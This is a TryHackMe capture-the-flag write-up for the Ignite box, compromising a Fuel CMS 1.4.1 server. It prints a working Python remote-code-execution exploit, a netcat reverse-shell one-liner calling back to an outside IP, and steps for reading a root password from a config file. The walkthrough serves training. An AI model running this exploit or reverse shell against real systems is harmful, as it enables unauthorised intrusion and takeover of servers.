A little Writeup about the Ignite challenge

Continue the series of writing up interesting challenges on Tryhackme. The challenge this time I writeup with you is Ignite.

A little Writeup about the Ignite challenge

Nmap

We can see two ports in the nmap scan but only port 80 is open, the other port is filtered so we can ignore it. Discover what port 80 has.

HTTP

I think this is a new kind of CMS system because I have never seen it used in any other vulnerable system.

During the nmap scan, we can see that file robots.txt there are several data entries.

When I try to access /fuelthen I found this login screen.

Since we don’t have any credentials we can’t log into the site, so we’ll need to find some workaround.

What comes to mind is is that the default login? And I was right, the login is admin:adminbut I found out I don’t need them.

Just change the plan, I’m looking for information about fuel above searchsploit and found the RCE for the version 1.4.1

Next is to download the exploit and change line 14 to URL = “http://10.0.0.130/” ie IP of the machine.

Here is the exploit:

import requests
import urllib

URL = "http://10.0.0.130/"


def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')
    url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print(r.text[0:dup])

Run the exploit and enter the input.

NOTE: Make sure the input command is in “” ie when you run the exploit you will have to enter the command you want to execute. Example: Suppose you want to run ls then you must type cmd: “ls” and not cmd: ls. Note that the command must be enclosed in quotation marks.

Since we already know RCE, it is easy to get everse shell. Run the following command to get the reverse shell:

cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f"

This command will give you a reverse shell on your listener that will listen on port 4444 via nc -nlvp 4444

Now we can get the flag from the home directory.

Escalation of privileges

Since we’re on the victim machine, let’s try running the enum command to see if we can find anything. You can use the word wget to load the enum file from your system onto the machine.

After searching for a while, I found the root password at: /var/www/html/fuel/application/config/database.php

root: mememe

Okay we just found the password for the root user and now we can change our account to root by command su.

Then you just get the root flag from /root.

summary

Ignite is a pretty good challenge for beginners from @Darkstar and @lollava. If you are a beginner then I recommend you to play the Ignite challenge.

Alternatively, you can also solve Shodan.io on Tryhackme here.